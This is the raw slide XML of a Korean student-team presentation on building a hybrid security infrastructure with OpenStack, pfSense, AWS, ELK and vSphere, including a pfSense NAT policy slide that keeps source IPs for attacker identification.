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261" r:id="rId22"/>
    <p:sldId id="280" r:id="rId23"/>
    <p:sldId id="293" r:id="rId24"/>
    <p:sldId id="262" r:id="rId25"/>
    <p:sldId id="294" r:id="rId26"/>
    <p:sldId id="282" r:id="rId27"/>
    <p:sldId id="295" r:id="rId28"/>
    <p:sldId id="296" r:id="rId29"/>
    <p:sldId id="286" r:id="rId30"/>
    <p:sldId id="297" r:id="rId31"/>
    <p:sldId id="325" r:id="rId32"/>
    <p:sldId id="324" r:id="rId33"/>
    <p:sldId id="338" r:id="rId34"/>
    <p:sldId id="339" r:id="rId35"/>
    <p:sldId id="360" r:id="rId36"/>
    <p:sldId id="320" r:id="rId37"/>
    <p:sldId id="321" r:id="rId38"/>
    <p:sldId id="319" r:id="rId39"/>
    <p:sldId id="323" r:id="rId40"/>
    <p:sldId id="329" r:id="rId41"/>
    <p:sldId id="330" r:id="rId42"/>
    <p:sldId id="331" r:id="rId43"/>
    <p:sldId id="332" r:id="rId44"/>
    <p:sldId id="333" r:id="rId45"/>
    <p:sldId id="334" r:id="rId46"/>
    <p:sldId id="340" r:id="rId47"/>
    <p:sldId id="341" r:id="rId48"/>
    <p:sldId id="342" r:id="rId49"/>
    <p:sldId id="343" r:id="rId50"/>
    <p:sldId id="275" r:id="rId51"/>
    <p:sldId id="302" r:id="rId52"/>
    <p:sldId id="303" r:id="rId53"/>
    <p:sldId id="305" r:id="rId54"/>
    <p:sldId id="304" r:id="rId55"/>
    <p:sldId id="307" r:id="rId56"/>
    <p:sldId id="308" r:id="rId57"/>
    <p:sldId id="312" r:id="rId58"/>
    <p:sldId id="316" r:id="rId59"/>
    <p:sldId id="313" r:id="rId60"/>
    <p:sldId id="361" r:id="rId61"/>
    <p:sldId id="362" r:id="rId62"/>
    <p:sldId id="363" r:id="rId63"/>
    <p:sldId id="364" r:id="rId64"/>
    <p:sldId id="279" r:id="rId6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1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1092" y="31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958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6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7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00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14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41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62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59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48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1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46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18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09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6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0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58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03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88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68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08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82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36</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof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495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37</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof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4886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39</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof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829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6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42</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof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805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43</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof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7474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44</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof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389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45</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof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2133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768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966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30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254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26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824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325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336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106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490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464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0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236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420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768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93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463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539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66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5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7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73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73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jpe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17.png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2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7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9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17.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1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54.png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4.png"/><Relationship Id="rId10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5715000" y="1495044"/>
            <a:ext cx="761695" cy="761695"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 120048"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="1E3A8A">
              <a:alpha val="50000"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln w="254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24398" y="1705356"/>
            <a:ext cx="342900" cy="342900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Text 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3945636" y="2562149"/>
            <a:ext cx="4305910" cy="71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500" b="1" kern="0" spc="-112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보안 인프라 구축</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4500" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Text 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3964838" y="3353105"/>
            <a:ext cx="4267505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00" kern="0" spc="4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통합 보안 아키텍처 설계 및 구현 프로젝트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5524805" y="4190695"/>
            <a:ext cx="1143000" cy="3840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6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3111703" y="4533595"/>
            <a:ext cx="1209751" cy="371246"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 246306"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="22D3EE">
              <a:alpha val="10000"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="22D3EE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3273552" y="4653382"/>
            <a:ext cx="114300" cy="133502"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Text 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3414370" y="4619549"/>
            <a:ext cx="7955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7E8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OpenStack</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Shape 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4469587" y="4533595"/>
            <a:ext cx="1086307" cy="371246"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 246306"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="22D3EE">
              <a:alpha val="10000"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="22D3EE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rcRect l="-1507" r="-1507"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4631436" y="4653382"/>
            <a:ext cx="171907" cy="133502"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Text 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4829861" y="4619549"/>
            <a:ext cx="6144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7E8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pfSense</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Shape 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5702198" y="4533595"/>
            <a:ext cx="857707" cy="371246"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 246306"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="22D3EE">
              <a:alpha val="10000"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="22D3EE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rcRect l="-1507" r="-1507"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5864047" y="4653382"/>
            <a:ext cx="171907" cy="133502"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Text 11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6061558" y="4619549"/>
            <a:ext cx="3858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7E8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AWS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Shape 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6708038" y="4533595"/>
            <a:ext cx="1162202" cy="371246"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 246306"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="22D3EE">
              <a:alpha val="10000"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="22D3EE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870802" y="4653382"/>
            <a:ext cx="133502" cy="133502"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Text 13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7029907" y="4619549"/>
            <a:ext cx="7287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7E8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ELK Stack</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="Shape 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8022946" y="4533595"/>
            <a:ext cx="1067105" cy="371246"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 246306"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="22D3EE">
              <a:alpha val="10000"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="22D3EE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184794" y="4653382"/>
            <a:ext cx="133502" cy="133502"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="Text 15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8343900" y="4619549"/>
            <a:ext cx="6336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7E8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vSphere</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="Shape 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="5629046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17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="5867705"/>
            <a:ext cx="11859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b="1" kern="0" spc="52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TEAM</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="Text 18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="6096305"/>
            <a:ext cx="125730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KSL</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Text 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4648810" y="5905195"/>
            <a:ext cx="31199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MEMBERS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="Text 20"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4634179" y="6133795"/>
            <a:ext cx="3148279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ko-KR" altLang="en-US" sz="13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김찬혁</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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3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송은수</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" alt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이광준</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1300" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="Text 21"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10778033" y="5905195"/>
            <a:ext cx="9573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</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="Text 22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10748772" y="6133795"/>
            <a:ext cx="98663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2026.02.02</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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71500" y="381305"/>
            <a:ext cx="761695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Text 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="571500" y="1037844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네트워크 흐름 제어 및 외부 서비스 연결 정책</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1300"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Text 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="571500" y="523951"/>
            <a:ext cx="5353812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pfSense-2 NAT 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정책</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2700"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="116" name="그룹 115"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8204911" y="1937686"/>
            <a:ext cx="3534156" cy="4368330"/>
            <a:chOff x="8204911" y="1933956"/>
            <a:chExt cx="3534156" cy="3186582"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="Shape 12"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8204911" y="1933956"/>
              <a:ext cx="3534156" cy="3186582"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 1744"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="1E293B">
                <a:alpha val="60000"/>
              </a:srgbClr>
            </a:solidFill>
            <a:ln w="12700">
              <a:solidFill>
                <a:srgbClr val="94A3B8">
                  <a:alpha val="1000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1" name="Shape 84"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8214970" y="1933956"/>
              <a:ext cx="3514954" cy="38405"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="F97316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2" name="Shape 85"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8214970" y="2658161"/>
              <a:ext cx="3514954" cy="9144"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FFFFFF">
                <a:alpha val="5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3" name="Shape 86"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8365127" y="2122281"/>
              <a:ext cx="461380" cy="346641"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 59952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FFFFFF">
                  <a:alpha val="10000"/>
                </a:srgbClr>
              </a:solidFill>
              <a:prstDash val="solid"/>
            </a:ln>
            <a:effectLst>
              <a:outerShdw blurRad="101600" dist="12700" dir="16200000" algn="bl" rotWithShape="0">
                <a:srgbClr val="F97316">
                  <a:alpha val="15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94" name="Image 5" descr="preencoded.png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8509406" y="2224470"/>
              <a:ext cx="171908" cy="141448"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="95" name="Text 87"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8929117" y="2128990"/>
              <a:ext cx="514807" cy="179918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5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NAT</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1500"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="96" name="Text 88"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8929116" y="2352752"/>
              <a:ext cx="590803" cy="112785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900">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF">
                      <a:alpha val="80000"/>
                    </a:srgbClr>
                  </a:solidFill>
                  <a:latin typeface="Noto Sans KR"/>
                  <a:ea typeface="Noto Sans KR"/>
                  <a:cs typeface="Noto Sans KR"/>
                </a:rPr>
                <a:t>주소 변환</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="900"/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8405164" y="2836000"/>
              <a:ext cx="3133650" cy="2153552"/>
              <a:chOff x="4530851" y="2306848"/>
              <a:chExt cx="3133650" cy="2176650"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="15" name="Shape 13"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4530851" y="2306848"/>
                <a:ext cx="3133649" cy="609905"/>
              </a:xfrm>
              <a:prstGeom prst="roundRect">
                <a:avLst>
                  <a:gd name="adj" fmla="val 18741"/>
                </a:avLst>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="0F172A">
                  <a:alpha val="3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6" name="Text 14"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4845405" y="2523143"/>
                <a:ext cx="2044598" cy="28798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10.10.0.0/24 ↔ 10.0.0.0/24</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr marL="0" lvl="0" indent="0" algn="l">
                  <a:buNone/>
                  <a:defRPr/>
                </a:pPr>
                <a:r>
                  <a:rPr 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10.10.0.0/24 ↔ 172.16.0.0/24</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr marL="0" lvl="0" indent="0" algn="l">
                  <a:buNone/>
                  <a:defRPr/>
                </a:pPr>
                <a:r>
                  <a:rPr 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NO NAT </a:t>
                </a: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적용</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" sz="900"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="17" name="Shape 15"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4530852" y="3087258"/>
                <a:ext cx="3133649" cy="568841"/>
              </a:xfrm>
              <a:prstGeom prst="roundRect">
                <a:avLst>
                  <a:gd name="adj" fmla="val 18741"/>
                </a:avLst>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="0F172A">
                  <a:alpha val="3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8" name="Text 16"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4863694" y="3348202"/>
                <a:ext cx="2100681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서버 → 외부</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" altLang="ko-KR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(</a:t>
                </a:r>
                <a:r>
                  <a:rPr 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WAN) </a:t>
                </a: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통신 시</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr marL="0" lvl="0" indent="0" algn="l">
                  <a:buNone/>
                  <a:defRPr/>
                </a:pPr>
                <a:r>
                  <a:rPr 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WAN Address </a:t>
                </a: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기반 </a:t>
                </a:r>
                <a:r>
                  <a:rPr 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Masquerading </a:t>
                </a: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적용</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" sz="900"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="19" name="Shape 17"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4530851" y="3811738"/>
                <a:ext cx="3133649" cy="671760"/>
              </a:xfrm>
              <a:prstGeom prst="roundRect">
                <a:avLst>
                  <a:gd name="adj" fmla="val 18741"/>
                </a:avLst>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="0F172A">
                  <a:alpha val="3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0" name="Text 18"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4816144" y="4093202"/>
                <a:ext cx="2581046" cy="32375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서버 트래픽의 원본 </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" altLang="ko-KR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IP </a:t>
                </a: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보존</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr marL="0" lvl="0" indent="0" algn="l">
                  <a:buNone/>
                  <a:defRPr/>
                </a:pP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보안 분석</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" altLang="ko-KR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·</a:t>
                </a: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로그 추적 용이성 확보</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr marL="0" lvl="0" indent="0" algn="l">
                  <a:buNone/>
                  <a:defRPr/>
                </a:pPr>
                <a:r>
                  <a:rPr lang="en-US" altLang="ko-KR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Suricata / ELK </a:t>
                </a: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연동 시 정확한 공격자 식별</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" sz="900"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="53" name="Text 50"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4863693" y="2399818"/>
                <a:ext cx="1156716" cy="9898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ko-KR" altLang="en-US" sz="1100" b="1">
                    <a:solidFill>
                      <a:srgbClr val="F1F5F9"/>
                    </a:solidFill>
                    <a:latin typeface="Noto Sans KR"/>
                    <a:ea typeface="Noto Sans KR"/>
                    <a:cs typeface="Noto Sans KR"/>
                  </a:rPr>
                  <a:t>내부 ↔ 내부 트래픽</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" sz="1100"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="54" name="Text 51"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4882896" y="3182881"/>
                <a:ext cx="1624889" cy="16276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en-US" sz="1100" b="1">
                    <a:solidFill>
                      <a:srgbClr val="F1F5F9"/>
                    </a:solidFill>
                    <a:latin typeface="Noto Sans KR"/>
                    <a:ea typeface="Noto Sans KR"/>
                    <a:cs typeface="Noto Sans KR"/>
                  </a:rPr>
                  <a:t>Masquerading </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="ko-KR" altLang="en-US" sz="1100" b="1">
                    <a:solidFill>
                      <a:srgbClr val="F1F5F9"/>
                    </a:solidFill>
                    <a:latin typeface="Noto Sans KR"/>
                    <a:ea typeface="Noto Sans KR"/>
                    <a:cs typeface="Noto Sans KR"/>
                  </a:rPr>
                  <a:t>적용 구간</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="55" name="Text 52"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4845405" y="3897386"/>
                <a:ext cx="1644091" cy="16276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en-US" sz="1100" b="1">
                    <a:solidFill>
                      <a:srgbClr val="F1F5F9"/>
                    </a:solidFill>
                    <a:latin typeface="Noto Sans KR"/>
                    <a:ea typeface="Noto Sans KR"/>
                    <a:cs typeface="Noto Sans KR"/>
                  </a:rPr>
                  <a:t>pfSense-2 NAT </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="ko-KR" altLang="en-US" sz="1100" b="1">
                    <a:solidFill>
                      <a:srgbClr val="F1F5F9"/>
                    </a:solidFill>
                    <a:latin typeface="Noto Sans KR"/>
                    <a:ea typeface="Noto Sans KR"/>
                    <a:cs typeface="Noto Sans KR"/>
                  </a:rPr>
                  <a:t>설계 원칙</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" sz="1100"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="97" name="Image 6" descr="preencoded.png"/>
              <p:cNvPicPr>
                <a:picLocks noChangeAspect="1"/>
              </p:cNvPicPr>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill rotWithShape="1">
              <a:blip r:embed="rId4">
                <a:alphaModFix amt="80000"/>
              </a:blip>
              <a:srcRect/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="4644310" y="2397787"/>
                <a:ext cx="138303" cy="100686"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="98" name="Image 7" descr="preencoded.png"/>
              <p:cNvPicPr>
                <a:picLocks noChangeAspect="1"/>
              </p:cNvPicPr>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill rotWithShape="1">
              <a:blip r:embed="rId5">
                <a:alphaModFix amt="80000"/>
              </a:blip>
              <a:srcRect l="-1910" r="-1910"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="4621077" y="3189445"/>
                <a:ext cx="161537" cy="115140"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="99" name="Image 8" descr="preencoded.png"/>
              <p:cNvPicPr>
                <a:picLocks noChangeAspect="1"/>
              </p:cNvPicPr>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill rotWithShape="1">
              <a:blip r:embed="rId6">
                <a:alphaModFix amt="80000"/>
              </a:blip>
              <a:srcRect l="-130" r="-130"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="4644310" y="3897386"/>
                <a:ext cx="104004" cy="116466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/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="525422" y="1882212"/>
            <a:ext cx="7179615" cy="4480487"/>
            <a:chOff x="371246" y="1537106"/>
            <a:chExt cx="7582205" cy="4949647"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9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5670" t="36420" r="4090"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="571500" y="1932207"/>
            <a:ext cx="7073189" cy="43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5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571500" y="838505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하이브리드 보안 인프라 구성을 위한 AWS 클라우드 활용 전략</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1300"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Shape 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="571500" y="1257300"/>
